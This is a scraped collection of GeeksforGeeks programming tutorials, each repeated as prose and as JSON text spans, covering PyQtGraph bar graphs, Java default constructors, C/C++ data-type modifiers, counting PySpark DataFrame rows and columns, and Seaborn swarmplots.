# Start Qt event loop unless running in interactive mode or using if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'): QtGui.QApplication.instance().exec_() Output : Python-gui Python-PyQtGraph Python Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 28, "s": 0, "text": "\n05 May, 2021" }, { "code": null, "e": 487, "s": 28, "text": "In this article we will see how we can create bar graph in the PyQtGraph module. PyQtGraph is a graphics and user interface library for Python that provides functionality commonly required in designing and science applications. Its primary goals are to provide fast, interactive graphics for displaying data (plots, video, etc.) and second is to provide tools to aid in rapid application development (for example, property trees such as used in Qt Designer)." }, { "code": null, "e": 851, "s": 487, "text": "A bar graph is a method for visualizing a set of data. Simple bar graphs compare data with one independent variable and can relate to a set point or range of data. Complex bar graphs compare data with two independent variables. Either type of graph can be oriented horizontally or vertically. Bar graph is created with the help of BarGraphItem class in PyQtGraph." }, { "code": null, "e": 1170, "s": 851, "text": "In order to plot the bar graph in PyQtGraph we have to do the following1. Importing the PyQtgraph module2. Creating a plot window3. Create or get the plotting data i.e horizontal and vertical data4. Create a BarGraphItem object to plot the bar graph between the data5. Append the BarGraphItem object to the plot window" }, { "code": null, "e": 1198, "s": 1170, "text": "Below is the implementation" }, { "code": "# importing pyqtgraph as pgimport pyqtgraph as pg # importing QtCore and QtGui from # the pyqtgraph modulefrom pyqtgraph.Qt import QtCore, QtGui # importing numpy as npimport numpy as np import time # creating a pyqtgraph plot windowwindow = pg.plot() # setting window geometry# left = 100, top = 100# width = 600, height = 500window.setGeometry(100, 100, 600, 500) # title for the plot windowtitle = \"GeeksforGeeks PyQtGraph\" # setting window title to plot windowwindow.setWindowTitle(title) # create list for y-axisy1 = [5, 5, 7, 10, 3, 8, 9, 1, 6, 2] # create horizontal list i.e x-axisx = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] # create pyqt5graph bar graph item# with width = 0.6# with bar colors = greenbargraph = pg.BarGraphItem(x = x, height = y1, width = 0.6, brush ='g') # add item to plot window# adding bargraph item to the windowwindow.addItem(bargraph) # main methodif __name__ == '__main__': # importing system import sys # Start Qt event loop unless running in interactive mode or using if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'): QtGui.QApplication.instance().exec_()", "e": 2349, "s": 1198, "text": null }, { "code": null, "e": 2358, "s": 2349, "text": "Output :" }, { "code": null, "e": 2369, "s": 2358, "text": "Python-gui" }, { "code": null, "e": 2386, "s": 2369, "text": "Python-PyQtGraph" }, { "code": null, "e": 2393, "s": 2386, "text": "Python" } ]
Default constructor in Java
10 Jul, 2018 Like C++, Java automatically creates default constructor if there is no default or parameterized constructor written by user, and (like C++) the default constructor automatically calls parent default constructor. But unlike C++, default constructor in Java initializes member data variable to default values (numeric values are initialized as 0, booleans are initialized as false and references are initialized as null). For example, output of the below program is 0nullfalse00.0 // Main.javaclass Test { int i; Test t; boolean b; byte bt; float ft;} public class Main { public static void main(String args[]) { Test t = new Test(); // default constructor is called. System.out.println(t.i); System.out.println(t.t); System.out.println(t.b); System.out.println(t.bt); System.out.println(t.ft); }} Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above. References:http://leepoint.net/notes-java/oop/constructors/constructor.html Java School Programming Java Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Arrays in Java Split() String method in Java with examples Arrays.sort() in Java with examples Object Oriented Programming (OOPs) Concept in Java Reverse a string in Java Python Dictionary Reverse a string in Java Arrays in C/C++ Introduction To PYTHON Interfaces in Java
[ { "code": null, "e": 53, "s": 25, "text": "\n10 Jul, 2018" }, { "code": null, "e": 474, "s": 53, "text": "Like C++, Java automatically creates default constructor if there is no default or parameterized constructor written by user, and (like C++) the default constructor automatically calls parent default constructor. But unlike C++, default constructor in Java initializes member data variable to default values (numeric values are initialized as 0, booleans are initialized as false and references are initialized as null)." }, { "code": null, "e": 518, "s": 474, "text": "For example, output of the below program is" }, { "code": null, "e": 533, "s": 518, "text": "0nullfalse00.0" }, { "code": "// Main.javaclass Test { int i; Test t; boolean b; byte bt; float ft;} public class Main { public static void main(String args[]) { Test t = new Test(); // default constructor is called. System.out.println(t.i); System.out.println(t.t); System.out.println(t.b); System.out.println(t.bt); System.out.println(t.ft); }}", "e": 897, "s": 533, "text": null }, { "code": null, "e": 1022, "s": 897, "text": "Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above." }, { "code": null, "e": 1098, "s": 1022, "text": "References:http://leepoint.net/notes-java/oop/constructors/constructor.html" }, { "code": null, "e": 1103, "s": 1098, "text": "Java" }, { "code": null, "e": 1122, "s": 1103, "text": "School Programming" }, { "code": null, "e": 1127, "s": 1122, "text": "Java" }, { "code": null, "e": 1225, "s": 1127, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 1240, "s": 1225, "text": "Arrays in Java" }, { "code": null, "e": 1284, "s": 1240, "text": "Split() String method in Java with examples" }, { "code": null, "e": 1320, "s": 1284, "text": "Arrays.sort() in Java with examples" }, { "code": null, "e": 1371, "s": 1320, "text": "Object Oriented Programming (OOPs) Concept in Java" }, { "code": null, "e": 1396, "s": 1371, "text": "Reverse a string in Java" }, { "code": null, "e": 1414, "s": 1396, "text": "Python Dictionary" }, { "code": null, "e": 1439, "s": 1414, "text": "Reverse a string in Java" }, { "code": null, "e": 1455, "s": 1439, "text": "Arrays in C/C++" }, { "code": null, "e": 1478, "s": 1455, "text": "Introduction To PYTHON" } ]
Interesting facts about data-types and modifiers in C/C++
17 Apr, 2020 Here are some logical and interesting facts about data-types and the modifiers associated with data-types:- 1. If no data type is given to a variable, the compiler automatically converts it to int data type. C++ C #include <iostream>using namespace std; int main(){ signed a; signed b; // size of a and b is equal to the size of int cout << "The size of a is " << sizeof(a) <<endl; cout << "The size of b is " << sizeof(b); return (0);} // This code is contributed by shubhamsingh10 #include <stdio.h>int main(){ signed a; signed b; // size of a and b is equal to the size of int printf("The size of a is %d\n", sizeof(a)); printf("The size of b is %d", sizeof(b)); return (0);} The size of a is 4 The size of b is 4 2. Signed is the default modifier for char and int data types. C++ C #include <iostream>using namespace std; int main(){ int x; char y; x = -1; y = -2; cout << "x is "<< x <<" and y is " << y << endl;} // This code is contributed by shubhamsingh10 #include <stdio.h>int main(){ int x; char y; x = -1; y = -2; printf("x is %d and y is %d", x, y);} x is -1 and y is -2. 3. We can’t use any modifiers in float data type. If programmer tries to use it ,the compiler automatically gives compile time error. C++ C #include <iostream>using namespace std;int main(){ signed float a; short float b; return (0);}//This article is contributed by shivanisinghss2110 #include <stdio.h>int main(){ signed float a; short float b; return (0);} [Error] both 'signed' and 'float' in declaration specifiers [Error] both 'short' and 'float' in declaration specifiers 4. Only long modifier is allowed in double data types. We cant use any other specifier with double data type. If we try any other specifier, compiler will give compile time error. C++ C #include <iostream>using namespace std;int main(){ long double a; return (0);} // This code is contributed by shubhamsingh10 #include <stdio.h>int main(){ long double a; return (0);} C++ C #include <iostream>using namespace std;int main(){ short double a; signed double b; return (0);} // This code is contributed by shubhamsingh10 #include <stdio.h>int main(){ short double a; signed double b; return (0);} [Error] both 'short' and 'double' in declaration specifiers [Error] both 'signed' and 'double' in declaration specifiers This article is contributed by Bishal Kumar Dubey. If you like GeeksforGeeks and would like to contribute, you can also write an article using contribute.geeksforgeeks.org or mail your article to [email protected]. See your article appearing on the GeeksforGeeks main page and help other Geeks. Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above. Rhythm1 SHUBHAMSINGH10 shivanisinghss2110 cpp-data-types interesting-facts C Language C++ CPP Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 52, "s": 24, "text": "\n17 Apr, 2020" }, { "code": null, "e": 160, "s": 52, "text": "Here are some logical and interesting facts about data-types and the modifiers associated with data-types:-" }, { "code": null, "e": 260, "s": 160, "text": "1. If no data type is given to a variable, the compiler automatically converts it to int data type." }, { "code": null, "e": 264, "s": 260, "text": "C++" }, { "code": null, "e": 266, "s": 264, "text": "C" }, { "code": "#include <iostream>using namespace std; int main(){ signed a; signed b; // size of a and b is equal to the size of int cout << \"The size of a is \" << sizeof(a) <<endl; cout << \"The size of b is \" << sizeof(b); return (0);} // This code is contributed by shubhamsingh10", "e": 559, "s": 266, "text": null }, { "code": "#include <stdio.h>int main(){ signed a; signed b; // size of a and b is equal to the size of int printf(\"The size of a is %d\\n\", sizeof(a)); printf(\"The size of b is %d\", sizeof(b)); return (0);}", "e": 777, "s": 559, "text": null }, { "code": null, "e": 816, "s": 777, "text": "The size of a is 4\nThe size of b is 4\n" }, { "code": null, "e": 879, "s": 816, "text": "2. Signed is the default modifier for char and int data types." }, { "code": null, "e": 883, "s": 879, "text": "C++" }, { "code": null, "e": 885, "s": 883, "text": "C" }, { "code": "#include <iostream>using namespace std; int main(){ int x; char y; x = -1; y = -2; cout << \"x is \"<< x <<\" and y is \" << y << endl;} // This code is contributed by shubhamsingh10", "e": 1081, "s": 885, "text": null }, { "code": "#include <stdio.h>int main(){ int x; char y; x = -1; y = -2; printf(\"x is %d and y is %d\", x, y);}", "e": 1195, "s": 1081, "text": null }, { "code": null, "e": 1217, "s": 1195, "text": "x is -1 and y is -2.\n" }, { "code": null, "e": 1351, "s": 1217, "text": "3. We can’t use any modifiers in float data type. If programmer tries to use it ,the compiler automatically gives compile time error." }, { "code": null, "e": 1355, "s": 1351, "text": "C++" }, { "code": null, "e": 1357, "s": 1355, "text": "C" }, { "code": "#include <iostream>using namespace std;int main(){ signed float a; short float b; return (0);}//This article is contributed by shivanisinghss2110", "e": 1512, "s": 1357, "text": null }, { "code": "#include <stdio.h>int main(){ signed float a; short float b; return (0);}", "e": 1595, "s": 1512, "text": null }, { "code": null, "e": 1715, "s": 1595, "text": "[Error] both 'signed' and 'float' in declaration specifiers\n[Error] both 'short' and 'float' in declaration specifiers\n" }, { "code": null, "e": 1895, "s": 1715, "text": "4. Only long modifier is allowed in double data types. We cant use any other specifier with double data type. If we try any other specifier, compiler will give compile time error." }, { "code": null, "e": 1899, "s": 1895, "text": "C++" }, { "code": null, "e": 1901, "s": 1899, "text": "C" }, { "code": "#include <iostream>using namespace std;int main(){ long double a; return (0);} // This code is contributed by shubhamsingh10", "e": 2033, "s": 1901, "text": null }, { "code": "#include <stdio.h>int main(){ long double a; return (0);}", "e": 2097, "s": 2033, "text": null }, { "code": null, "e": 2101, "s": 2097, "text": "C++" }, { "code": null, "e": 2103, "s": 2101, "text": "C" }, { "code": "#include <iostream>using namespace std;int main(){ short double a; signed double b; return (0);} // This code is contributed by shubhamsingh10", "e": 2256, "s": 2103, "text": null }, { "code": "#include <stdio.h>int main(){ short double a; signed double b; return (0);}", "e": 2341, "s": 2256, "text": null }, { "code": null, "e": 2463, "s": 2341, "text": "[Error] both 'short' and 'double' in declaration specifiers\n[Error] both 'signed' and 'double' in declaration specifiers\n" }, { "code": null, "e": 2769, "s": 2463, "text": "This article is contributed by Bishal Kumar Dubey. If you like GeeksforGeeks and would like to contribute, you can also write an article using contribute.geeksforgeeks.org or mail your article to [email protected]. See your article appearing on the GeeksforGeeks main page and help other Geeks." }, { "code": null, "e": 2894, "s": 2769, "text": "Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above." }, { "code": null, "e": 2902, "s": 2894, "text": "Rhythm1" }, { "code": null, "e": 2917, "s": 2902, "text": "SHUBHAMSINGH10" }, { "code": null, "e": 2936, "s": 2917, "text": "shivanisinghss2110" }, { "code": null, "e": 2951, "s": 2936, "text": "cpp-data-types" }, { "code": null, "e": 2969, "s": 2951, "text": "interesting-facts" }, { "code": null, "e": 2980, "s": 2969, "text": "C Language" }, { "code": null, "e": 2984, "s": 2980, "text": "C++" }, { "code": null, "e": 2988, "s": 2984, "text": "CPP" } ]
Get number of rows and columns of PySpark dataframe
13 Sep, 2021 In this article, we will discuss how to get the number of rows and the number of columns of a PySpark dataframe. For finding the number of rows and number of columns we will use count() and columns() with len() function respectively. df.count(): This function is used to extract number of rows from the Dataframe. df.distinct().count(): This functions is used to extract distinct number rows which are not duplicate/repeating in the Dataframe. df.columns(): This function is used to extract the list of columns names present in the Dataframe. len(df.columns): This function is used to count number of items present in the list. Example 1: Get the number of rows and number of columns of dataframe in pyspark. Python # importing necessary librariesfrom pyspark.sql import SparkSession # function to create SparkSessiondef create_session(): spk = SparkSession.builder \ .master("local") \ .appName("Products.com") \ .getOrCreate() return spk # function to create Dataframedef create_df(spark,data,schema): df1 = spark.createDataFrame(data,schema) return df1 # main functionif __name__ == "__main__": # calling function to create SparkSession spark = create_session() input_data = [(1,"Direct-Cool Single Door Refrigerator",12499), (2,"Full HD Smart LED TV",49999), (3,"8.5 kg Washing Machine",69999), (4,"T-shirt",1999), (5,"Jeans",3999), (6,"Men's Running Shoes",1499), (7,"Combo Pack Face Mask",999)] schm = ["Id","Product Name","Price"] # calling function to create dataframe df = create_df(spark,input_data,schm) df.show() # extracting number of rows from the Dataframe row = df.count() # extracting number of columns from the Dataframe col = len(df.columns) # printing print(f'Dimension of the Dataframe is: {(row,col)}') print(f'Number of Rows are: {row}') print(f'Number of Columns are: {col}') Output: Explanation: For counting the number of rows we are using the count() function df.count() which extracts the number of rows from the Dataframe and storing it in the variable named as ‘row’ For counting the number of columns we are using df.columns() but as this function returns the list of columns names, so for the count the number of items present in the list we are using len() function in which we are passing df.columns() this gives us the total number of columns and store it in the variable named as ‘col’. Example 2: Getting the Distinct number of rows and columns of Dataframe. Python # importing necessary librariesfrom pyspark.sql import SparkSession # function to create SparkSessiondef create_session(): spk = SparkSession.builder \ .master("local") \ .appName("Student_report.com") \ .getOrCreate() return spk # function to create Dataframedef create_df(spark,data,schema): df1 = spark.createDataFrame(data,schema) return df1 # main functionif __name__ == "__main__": # calling function to create SparkSession spark = create_session() input_data = [(1,"Shivansh","Male",20,80), (2,"Arpita","Female",18,66), (3,"Raj","Male",21,90), (4,"Swati","Female",19,91), (5,"Arpit","Male",20,50), (6,"Swaroop","Male",23,65), (6,"Swaroop","Male",23,65), (6,"Swaroop","Male",23,65), (7,"Reshabh","Male",19,70), (7,"Reshabh","Male",19,70), (8,"Dinesh","Male",20,75), (9,"Rohit","Male",21,85), (9,"Rohit","Male",21,85), (10,"Sanjana","Female",22,87)] schm = ["Id","Name","Gender","Age","Percentage"] # calling function to create dataframe df = create_df(spark,input_data,schm) df.show() # extracting number of distinct rows # from the Dataframe row = df.distinct().count() # extracting total number of rows from # the Dataframe all_rows = df.count() # extracting number of columns from the # Dataframe col = len(df.columns) # printing print(f'Dimension of the Dataframe is: {(row,col)}') print(f'Distinct Number of Rows are: {row}') print(f'Total Number of Rows are: {all_rows}') print(f'Number of Columns are: {col}') Output: Explanation: For counting the number of distinct rows we are using distinct().count() function which extracts the number of distinct rows from the Dataframe and storing it in the variable named as ‘row’ For counting the number of columns we are using df.columns() but as this functions returns the list of column names, so for the count the number of items present in the list we are using len() function in which we are passing df.columns() this gives us the total number of columns and store it in the variable named as ‘col’ Example 3: Getting the number of columns using dtypes function. In the example, after creating the Dataframe we are counting a number of rows using count() function and for counting the number of columns here we are using dtypes function. Since we know that dtypes function returns the list of tuples that contains the column name and datatype of the columns. So for every column, there is the tuple that contains the name and datatype of the column, from the list we are just counting the tuples The number of tuples is equal to the number of columns so this is also the one way to get the number of columns using dtypes function. Python # importing necessary librariesfrom pyspark.sql import SparkSession # function to create SparkSessiondef create_session(): spk = SparkSession.builder \ .master("local") \ .appName("Student_report.com") \ .getOrCreate() return spk # function to create Dataframedef create_df(spark,data,schema): df1 = spark.createDataFrame(data,schema) return df1 # main functionif __name__ == "__main__": # calling function to create SparkSession spark = create_session() input_data = [(1,"Shivansh","Male",20,80), (2,"Arpita","Female",18,66), (3,"Raj","Male",21,90), (4,"Swati","Female",19,91), (5,"Arpit","Male",20,50), (6,"Swaroop","Male",23,65), (7,"Reshabh","Male",19,70), (8,"Dinesh","Male",20,75), (9,"Rohit","Male",21,85), (10,"Sanjana","Female",22,87)] schm = ["Id","Name","Gender","Age","Percentage"] # calling function to create dataframe df = create_df(spark,input_data,schm) df.show() # extracting number of rows from the Dataframe row = df.count() # extracting number of columns from the Dataframe using dtypes function col = len(df.dtypes) # printing print(f'Dimension of the Dataframe is: {(row,col)}') print(f'Number of Rows are: {row}') print(f'Number of Columns are: {col}') Output: Example 4: Getting the dimension of the PySpark Dataframe by converting PySpark Dataframe to Pandas Dataframe. In the example code, after creating the Dataframe, we are converting the PySpark Dataframe to Pandas Dataframe using toPandas() function by writing df.toPandas(). After converting the dataframe we are using Pandas function shape for getting the dimension of the Dataframe. This shape function returns the tuple, so for printing the number of row and column individually. Python # importing necessary librariesfrom pyspark.sql import SparkSession # function to create SparkSessiondef create_session(): spk = SparkSession.builder \ .master("local") \ .appName("Student_report.com") \ .getOrCreate() return spk # function to create Dataframedef create_df(spark,data,schema): df1 = spark.createDataFrame(data,schema) return df1 # main functionif __name__ == "__main__": # calling function to create SparkSession spark = create_session() input_data = [(1,"Shivansh","Male",20,80), (2,"Arpita","Female",18,66), (3,"Raj","Male",21,90), (4,"Swati","Female",19,91), (5,"Arpit","Male",20,50), (6,"Swaroop","Male",23,65), (7,"Reshabh","Male",19,70), (8,"Dinesh","Male",20,75), (9,"Rohit","Male",21,85), (10,"Sanjana","Female",22,87)] schm = ["Id","Name","Gender","Age","Percentage"] # calling function to create dataframe df = create_df(spark,input_data,schm) df.show() # converting PySpark df to Pandas df using # toPandas() function new_df = df.toPandas() # using Pandas shape function for getting the # dimension of the df dimension = new_df.shape # printing print("Dimension of the Dataframe is: ",dimension) print(f'Number of Rows are: {dimension[0]}') print(f'Number of Columns are: {dimension[1]}') Output: anikakapoor rajeev0719singh Picked Python-Pyspark Python Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 28, "s": 0, "text": "\n13 Sep, 2021" }, { "code": null, "e": 262, "s": 28, "text": "In this article, we will discuss how to get the number of rows and the number of columns of a PySpark dataframe. For finding the number of rows and number of columns we will use count() and columns() with len() function respectively." }, { "code": null, "e": 342, "s": 262, "text": "df.count(): This function is used to extract number of rows from the Dataframe." }, { "code": null, "e": 472, "s": 342, "text": "df.distinct().count(): This functions is used to extract distinct number rows which are not duplicate/repeating in the Dataframe." }, { "code": null, "e": 571, "s": 472, "text": "df.columns(): This function is used to extract the list of columns names present in the Dataframe." }, { "code": null, "e": 656, "s": 571, "text": "len(df.columns): This function is used to count number of items present in the list." }, { "code": null, "e": 737, "s": 656, "text": "Example 1: Get the number of rows and number of columns of dataframe in pyspark." }, { "code": null, "e": 744, "s": 737, "text": "Python" }, { "code": "# importing necessary librariesfrom pyspark.sql import SparkSession # function to create SparkSessiondef create_session(): spk = SparkSession.builder \\ .master(\"local\") \\ .appName(\"Products.com\") \\ .getOrCreate() return spk # function to create Dataframedef create_df(spark,data,schema): df1 = spark.createDataFrame(data,schema) return df1 # main functionif __name__ == \"__main__\": # calling function to create SparkSession spark = create_session() input_data = [(1,\"Direct-Cool Single Door Refrigerator\",12499), (2,\"Full HD Smart LED TV\",49999), (3,\"8.5 kg Washing Machine\",69999), (4,\"T-shirt\",1999), (5,\"Jeans\",3999), (6,\"Men's Running Shoes\",1499), (7,\"Combo Pack Face Mask\",999)] schm = [\"Id\",\"Product Name\",\"Price\"] # calling function to create dataframe df = create_df(spark,input_data,schm) df.show() # extracting number of rows from the Dataframe row = df.count() # extracting number of columns from the Dataframe col = len(df.columns) # printing print(f'Dimension of the Dataframe is: {(row,col)}') print(f'Number of Rows are: {row}') print(f'Number of Columns are: {col}')", "e": 1929, "s": 744, "text": null }, { "code": null, "e": 1937, "s": 1929, "text": "Output:" }, { "code": null, "e": 1950, "s": 1937, "text": "Explanation:" }, { "code": null, "e": 2126, "s": 1950, "text": "For counting the number of rows we are using the count() function df.count() which extracts the number of rows from the Dataframe and storing it in the variable named as ‘row’" }, { "code": null, "e": 2452, "s": 2126, "text": "For counting the number of columns we are using df.columns() but as this function returns the list of columns names, so for the count the number of items present in the list we are using len() function in which we are passing df.columns() this gives us the total number of columns and store it in the variable named as ‘col’." }, { "code": null, "e": 2525, "s": 2452, "text": "Example 2: Getting the Distinct number of rows and columns of Dataframe." }, { "code": null, "e": 2532, "s": 2525, "text": "Python" }, { "code": "# importing necessary librariesfrom pyspark.sql import SparkSession # function to create SparkSessiondef create_session(): spk = SparkSession.builder \\ .master(\"local\") \\ .appName(\"Student_report.com\") \\ .getOrCreate() return spk # function to create Dataframedef create_df(spark,data,schema): df1 = spark.createDataFrame(data,schema) return df1 # main functionif __name__ == \"__main__\": # calling function to create SparkSession spark = create_session() input_data = [(1,\"Shivansh\",\"Male\",20,80), (2,\"Arpita\",\"Female\",18,66), (3,\"Raj\",\"Male\",21,90), (4,\"Swati\",\"Female\",19,91), (5,\"Arpit\",\"Male\",20,50), (6,\"Swaroop\",\"Male\",23,65), (6,\"Swaroop\",\"Male\",23,65), (6,\"Swaroop\",\"Male\",23,65), (7,\"Reshabh\",\"Male\",19,70), (7,\"Reshabh\",\"Male\",19,70), (8,\"Dinesh\",\"Male\",20,75), (9,\"Rohit\",\"Male\",21,85), (9,\"Rohit\",\"Male\",21,85), (10,\"Sanjana\",\"Female\",22,87)] schm = [\"Id\",\"Name\",\"Gender\",\"Age\",\"Percentage\"] # calling function to create dataframe df = create_df(spark,input_data,schm) df.show() # extracting number of distinct rows # from the Dataframe row = df.distinct().count() # extracting total number of rows from # the Dataframe all_rows = df.count() # extracting number of columns from the # Dataframe col = len(df.columns) # printing print(f'Dimension of the Dataframe is: {(row,col)}') print(f'Distinct Number of Rows are: {row}') print(f'Total Number of Rows are: {all_rows}') print(f'Number of Columns are: {col}')", "e": 4128, "s": 2532, "text": null }, { "code": null, "e": 4139, "s": 4131, "text": "Output:" }, { "code": null, "e": 4156, "s": 4143, "text": "Explanation:" }, { "code": null, "e": 4348, "s": 4158, "text": "For counting the number of distinct rows we are using distinct().count() function which extracts the number of distinct rows from the Dataframe and storing it in the variable named as ‘row’" }, { "code": null, "e": 4673, "s": 4348, "text": "For counting the number of columns we are using df.columns() but as this functions returns the list of column names, so for the count the number of items present in the list we are using len() function in which we are passing df.columns() this gives us the total number of columns and store it in the variable named as ‘col’" }, { "code": null, "e": 4739, "s": 4675, "text": "Example 3: Getting the number of columns using dtypes function." }, { "code": null, "e": 5309, "s": 4741, "text": "In the example, after creating the Dataframe we are counting a number of rows using count() function and for counting the number of columns here we are using dtypes function. Since we know that dtypes function returns the list of tuples that contains the column name and datatype of the columns. So for every column, there is the tuple that contains the name and datatype of the column, from the list we are just counting the tuples The number of tuples is equal to the number of columns so this is also the one way to get the number of columns using dtypes function." }, { "code": null, "e": 5318, "s": 5311, "text": "Python" }, { "code": "# importing necessary librariesfrom pyspark.sql import SparkSession # function to create SparkSessiondef create_session(): spk = SparkSession.builder \\ .master(\"local\") \\ .appName(\"Student_report.com\") \\ .getOrCreate() return spk # function to create Dataframedef create_df(spark,data,schema): df1 = spark.createDataFrame(data,schema) return df1 # main functionif __name__ == \"__main__\": # calling function to create SparkSession spark = create_session() input_data = [(1,\"Shivansh\",\"Male\",20,80), (2,\"Arpita\",\"Female\",18,66), (3,\"Raj\",\"Male\",21,90), (4,\"Swati\",\"Female\",19,91), (5,\"Arpit\",\"Male\",20,50), (6,\"Swaroop\",\"Male\",23,65), (7,\"Reshabh\",\"Male\",19,70), (8,\"Dinesh\",\"Male\",20,75), (9,\"Rohit\",\"Male\",21,85), (10,\"Sanjana\",\"Female\",22,87)] schm = [\"Id\",\"Name\",\"Gender\",\"Age\",\"Percentage\"] # calling function to create dataframe df = create_df(spark,input_data,schm) df.show() # extracting number of rows from the Dataframe row = df.count() # extracting number of columns from the Dataframe using dtypes function col = len(df.dtypes) # printing print(f'Dimension of the Dataframe is: {(row,col)}') print(f'Number of Rows are: {row}') print(f'Number of Columns are: {col}')", "e": 6622, "s": 5318, "text": null }, { "code": null, "e": 6633, "s": 6625, "text": "Output:" }, { "code": null, "e": 6748, "s": 6637, "text": "Example 4: Getting the dimension of the PySpark Dataframe by converting PySpark Dataframe to Pandas Dataframe." }, { "code": null, "e": 7121, "s": 6750, "text": "In the example code, after creating the Dataframe, we are converting the PySpark Dataframe to Pandas Dataframe using toPandas() function by writing df.toPandas(). After converting the dataframe we are using Pandas function shape for getting the dimension of the Dataframe. This shape function returns the tuple, so for printing the number of row and column individually." }, { "code": null, "e": 7130, "s": 7123, "text": "Python" }, { "code": "# importing necessary librariesfrom pyspark.sql import SparkSession # function to create SparkSessiondef create_session(): spk = SparkSession.builder \\ .master(\"local\") \\ .appName(\"Student_report.com\") \\ .getOrCreate() return spk # function to create Dataframedef create_df(spark,data,schema): df1 = spark.createDataFrame(data,schema) return df1 # main functionif __name__ == \"__main__\": # calling function to create SparkSession spark = create_session() input_data = [(1,\"Shivansh\",\"Male\",20,80), (2,\"Arpita\",\"Female\",18,66), (3,\"Raj\",\"Male\",21,90), (4,\"Swati\",\"Female\",19,91), (5,\"Arpit\",\"Male\",20,50), (6,\"Swaroop\",\"Male\",23,65), (7,\"Reshabh\",\"Male\",19,70), (8,\"Dinesh\",\"Male\",20,75), (9,\"Rohit\",\"Male\",21,85), (10,\"Sanjana\",\"Female\",22,87)] schm = [\"Id\",\"Name\",\"Gender\",\"Age\",\"Percentage\"] # calling function to create dataframe df = create_df(spark,input_data,schm) df.show() # converting PySpark df to Pandas df using # toPandas() function new_df = df.toPandas() # using Pandas shape function for getting the # dimension of the df dimension = new_df.shape # printing print(\"Dimension of the Dataframe is: \",dimension) print(f'Number of Rows are: {dimension[0]}') print(f'Number of Columns are: {dimension[1]}')", "e": 8477, "s": 7130, "text": null }, { "code": null, "e": 8488, "s": 8480, "text": "Output:" }, { "code": null, "e": 8504, "s": 8492, "text": "anikakapoor" }, { "code": null, "e": 8520, "s": 8504, "text": "rajeev0719singh" }, { "code": null, "e": 8527, "s": 8520, "text": "Picked" }, { "code": null, "e": 8542, "s": 8527, "text": "Python-Pyspark" }, { "code": null, "e": 8549, "s": 8542, "text": "Python" } ]
Swarmplot using Seaborn in Python
06 Nov, 2020 Seaborn is an amazing visualization library for statistical graphics plotting in Python. It provides beautiful default styles and color palettes to make statistical plots more attractive. It is built on the top of the matplotlib library and also closely integrated into the data structures from pandas. Seaborn swarmplot is probably similar to stripplot, only the points are adjusted so it won’t get overlap to each other as it helps to represent the better representation of the distribution of values. A swarm plot can be drawn on its own, but it is also a good complement to a box, preferable because the associated names will be used to annotate the axes. This type of plot sometimes known as “beeswarm”. Syntax: seaborn.swarmplot(x=None, y=None, hue=None, data=None, order=None, hue_order=None, dodge=False, orient=None, color=None, palette=None, size=5, edgecolor=’gray’, linewidth=0, ax=None, **kwargs) Parameters: x, y, hue: Inputs for plotting long-form data. data: Dataset for plotting. color: Color for all of the elements size: Radius of the markers, in points. Example 1: Basic visualization of “fmri” dataset using swarmplot() Python3 import seaborn seaborn.set(style='whitegrid')fmri = seaborn.load_dataset("fmri") seaborn.swarmplot(x="timepoint", y="signal", data=fmri) Output: Example 2: Grouping data points on the basis of category, here as region and event. Python3 import seaborn seaborn.set(style='whitegrid')fmri = seaborn.load_dataset("fmri") seaborn.swarmplot(x="timepoint", y="signal", hue="region", data=fmri) Output: Example 3: Basic visualization of “tips” dataset using swarmplot() Python3 import seaborn seaborn.set(style='whitegrid')tip = seaborn.load_dataset('tips') seaborn.swarmplot(x='day', y='tip', data=tip) Output: 1. Draw a single horizontal swarm plot using only one axis: If we use only one data variable instead of two data variables then it means that the axis denotes each of these data variables as an axis. X denotes an x-axis and y denote a y-axis. Syntax: seaborn.swarmplot(x) Python3 # Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style="whitegrid") # loading data-settips = seaborn.load_dataset("tips") seaborn.swarmplot(x=tips["total_bill"]) Output: 2. Draw horizontal swarms: In the above example we see how to plot single horizontal swarm plot and here can perform multiple horizontal swarm plot with exchange the data variable with another axis. Python3 # Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style="whitegrid") # loading data-settips = seaborn.load_dataset("tips") seaborn.swarmplot(x="total_bill", y="day", data=tips) Output: 3. Using hue parameter: While the points are plotted in two dimensions, another dimension can be added to the plot by coloring the points according to a third variable. Syntax: sns.swarmplot(x, y, hue, data); Python3 # Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style="whitegrid") # loading data-settips = seaborn.load_dataset("tips") seaborn.swarmplot(x="day", y="total_bill", hue="time", data=tips) Output: 4. Draw outlines around the data points using linewidth: Width of the gray lines that frame the plot elements. Whenever we increase linewidth than the point also will increase automatically. Syntax: seaborn.swarmplot(x, y, data, linewidth) Python3 # Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style="whitegrid") # loading data-settips = seaborn.load_dataset("tips") seaborn.swarmplot(x="day", y="total_bill", data=tips, linewidth=2) Output: We can change the color with edgecolor: Python3 seaborn.swarmplot(y="total_bill", x="day", data=tips, linewidth=2,edgecolor='green') Output: 5. Draw each level of the hue variable at different locations on the major categorical axis: When using hue nesting, setting dodge should be True will separate the point for different hue levels along the categorical axis. And Palette is used for the different levels of the hue variable. Syntax: seaborn.stripplot(x, y, data, hue, palette, dodge) Python3 # Python program to illustrate# swarmplot using inbuilt data-set# given in seaborn # importing the required moduleimport seaborn # use to set style of background of plotseaborn.set(style="whitegrid") # loading data-settips = seaborn.load_dataset("tips") seaborn.swarmplot(x="day", y="total_bill", hue="smoker", data=tips, palette="Set2", dodge=True) 